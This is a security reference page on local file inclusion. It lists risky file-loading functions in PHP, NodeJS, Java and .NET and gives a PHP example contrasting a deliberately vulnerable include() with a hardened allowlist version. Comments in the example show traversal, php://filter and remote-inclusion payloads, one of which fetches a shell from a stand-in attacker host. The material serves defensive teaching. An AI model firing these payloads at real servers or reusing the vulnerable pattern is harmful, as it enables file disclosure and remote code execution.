# Local File Inclusion

* Local file inclusion (LFI) lets an attacker read, and in some cases execute, files on the server's local filesystem by controlling a path that the application passes to a file-loading function.
* It is common in templating or "page loader" code that wraps every page in the same layout and picks the body file from a request parameter.
* Watch out for URL formats like /index.php?page=about, where the parameter value is likely a file name or template name.
* PHP
  * include() loads a local file, or a remote one if allow\_url\_include is enabled in php.ini (it is off by default).
  * The bug is the combination: the path comes from a user-controlled parameter and the code does not explicitly filter and sanitize it, so ../ traversal, php:// wrappers or (with remote inclusion enabled) http:// URLs reach the function.
  * Other functions to check for the same pattern:
    * include\_once(), require(), require\_once(), file\_get\_contents()
* NodeJS
  * Look for res.render() called with a user-supplied template name, and fs.readFile() or res.sendFile() called with a user-supplied path.
* Java
  * In Java (JSP/JSTL) code, look for include and import
* .NET
  * Response.WriteFile
  * Html.Partial
  * include
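The PHP pattern above, as an added example that is not code from the original page: a minimal page loader first written the vulnerable way, then hardened so the request parameter is an allowlist key rather than a path. The parameter name `page`, the `pages/` directory and the page names are assumptions.

```php
<?php
// Added example (not from the original page). The "page" parameter, the pages/
// directory and the page names are assumptions for illustration.
declare(strict_types=1);

// --- Vulnerable: the request parameter goes straight into include() ---
// Intended:  /index.php?page=about.php
//            -> include 'about.php'
// LFI:       /index.php?page=../../../../etc/passwd
//            -> the file's contents are returned in the response
// Wrapper:   /index.php?page=php://filter/convert.base64-encode/resource=index.php
//            -> the source of index.php is returned base64-encoded instead of executed
// RFI:       /index.php?page=http://attacker.example/shell.txt  (only if allow_url_include=On)
function vulnerable_page(string $page): void
{
    // No filtering between the attacker and the filesystem.
    include $page;
}

// --- Hardened: the parameter selects from an allowlist and never becomes a path ---
const PAGES_DIR     = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function resolve_page(string $page): ?string
{
    // 1. Exact-match allowlist: ../, wrappers, URLs and unknown files are all rejected here.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise the path and confirm it still sits inside
    //    PAGES_DIR, so a mistake in the allowlist or a symlink cannot escape it.
    $base   = realpath(PAGES_DIR);
    $target = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $target === false) {
        return null;
    }
    if (!str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {   // str_starts_with: PHP 8.0+
        return null;
    }
    return $target;
}

function safe_page(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

// Front controller: fall back to "home" when no (string) page parameter is present.
safe_page(isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : 'home');
```

The allowlist alone closes the hole; the `realpath()` check is there so that a later edit to the allowlist (or a symlink dropped into `pages/`) still cannot walk out of the directory. Independently of the code, confirm `allow_url_include` is `Off` in php.ini (the default), since it turns any LFI in the include/require family into remote code inclusion. On PHP older than 8.0 replace `str_starts_with()` with `strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0`.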

<table><thead><tr><th width="375">Function</th><th width="134">Read Content</th><th width="81">Execute</th><th>Remote URL</th></tr></thead><tbody><tr><td><strong>PHP</strong></td><td></td><td></td><td></td></tr><tr><td>include()/include_once()</td><td>Y</td><td>Y</td><td>Y (allow_url_include)</td></tr><tr><td>require()/require_once()</td><td>Y</td><td>Y</td><td>Y (allow_url_include)</td></tr><tr><td>file_get_contents()</td><td>Y</td><td>N</td><td>Y (allow_url_fopen)</td></tr><tr><td>fopen()/file()</td><td>Y</td><td>N</td><td>Y (allow_url_fopen)</td></tr><tr><td><strong>NodeJS</strong></td><td></td><td></td><td></td></tr><tr><td>fs.readFile()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>res.sendFile()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>res.render()</td><td>Y</td><td>Y</td><td>N</td></tr><tr><td><strong>Java</strong></td><td></td><td></td><td></td></tr><tr><td>include</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>import</td><td>Y</td><td>Y</td><td>Y</td></tr><tr><td><strong>.NET</strong></td><td></td><td></td><td></td></tr><tr><td>@Html.Partial()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>@Html.RemotePartial()</td><td>Y</td><td>N</td><td>Y</td></tr><tr><td>Response.WriteFile()</td><td>Y</td><td>N</td><td>N</td></tr><tr><td>include</td><td>Y</td><td>Y</td><td>Y</td></tr></tbody></table>

* Read Content: the file's bytes are returned to the caller or the response (source disclosure, /etc/passwd, config files).
* Execute: the target file is interpreted as code, so a file the attacker can write to (log, upload, session file) becomes code execution.
* Remote URL: the function will fetch http:// and similar URLs, turning LFI into remote file inclusion (RFI).
* In PHP, remote fetching is governed by php.ini: allow\_url\_include (default Off) for the include/require family, allow\_url\_fopen (default On) for file\_get\_contents(), fopen() and file().
